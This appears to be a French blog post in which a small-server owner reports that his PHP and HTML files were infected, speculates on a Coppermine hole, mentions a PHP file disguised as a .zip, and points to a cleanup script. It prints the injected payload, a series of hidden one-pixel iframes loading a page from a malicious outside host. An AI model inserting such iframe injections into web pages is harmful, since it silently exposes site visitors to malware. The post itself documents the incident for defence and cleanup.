Ayé, visiblement il y a du nouveau du coté de coppermine, ici

Drôle de nom pour un post, mais en fait c'est le nom de l'attaque qu'a reçu le mamieserv.

Comme il se trouve que par je ne sais quel tour de passe passe de google ce blog tombe dans les premiers résultats de la recherche en francais sur ce mot, je vais faire de mon mieux pour regrouper toutes les infos que je trouve la dessus.

D'après ce que j'ai pu lire ce matin, la faille proviendrait de coppermine (ce n'est qu'une supposition, certains penseraient qu'elle proviens de joomla, de phpbb ou de vbulletin)
Il se trouve que j'ai un joomla et plusieurs versions de phpbb sur le mamieserv, ainsi qu'une galerie coppermine.
Mais pas de vbulletin.

Il n'a pas encore été défini comment l'attaque a été possible visiblement, mais a prioris pour la supprimer (supprimer les effets, pas la faille) il suffirait de supprimer les lignes ajoutées.

vu que quasiment tous les fichiers php et html ont été touchés, bonne chance :(

(je vais essayer de faire un petit script qui nettoie tout ça tout seul, je le mettrais par ici).

Il y a eu visiblement plusieurs types d'attaques, pour certains, un fichier .zip ( 142739_298w3.zip pour être précis) aurait été ajouté dans un dossier de coppermine, ce fichier étant en fait un fichier php renommé en .zip (ouvrez le avec le bloc notes si vous l'avez).
Cependant je n'ai pas trouvé ce fichier (ni aucun .zip suspect) sur le mamieserv, donc dans mon cas c'est autre chose.

Pour le moment j'ai coupé le serveur web pour être sur de ne pas être un vecteur de contamination...

Plus d'infos quand j'en aurais trouvé d'autres.

Bon, petit edit pour ajouter un lien vers un script php qui nettoie a peu près bien, je l'ai un poil modifié pour qu'il nettoie les .htm et les .html (sinon il ne passe que sur les .html)
la version modifiée ici et l'original là.

Une petite recherche sur "cdpuvbhfzz.com" dans google ou autre et on voit que je suis pas le seul, de plus le site en question "Ce site risque d'endommager votre ordinateur." d'après google.

Touts les fichiers php du mamieserv ont été infectés, et pour la plupart je n'ai pas de backup...

Va falloir trouver comment cette merde est entrée...

Je ne comprends pas ce qu'il se passe mais sur chaque page du mamieserv (enfin j'en ai essayé 2) il y a des iframes qui sont apparues.
Je ne sais pas quel est leur but mais je vous déconseille d'aller voir des fois que ce soit un méchant piratage de je ne sais pas quoi qui fasse pas que du bien...

Pour la peine voilà le code source qu'il y a en bas de la page d'accueil :

(en fait dans la source originale chaque caractère est remplacé par son code html mais je ne réussis pas à afficher le code et pas le rendu ici donc tant pis)
<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>


edit : vu que ce post est bien placé dans les moteurs de recherche, j'indique ici que je poursuit mes recherches la dessus dans les posts suivants, à l'heure actuelle je n'ai pas trouvé comment combler la faille mais juste une piste pour enlever l'infection, cf les posts suivants.

Juste pour le fun, voilà sur quoi je tombe quand je vais sur la page de windows update avec internet explorer 8 :
(et encore, j'ai du nettoyer le html, il y avait des balises qui fermaient sans avoir été ouvertes, des trucs qui n'existent nulle part, enfin du pur internet explorer quoi)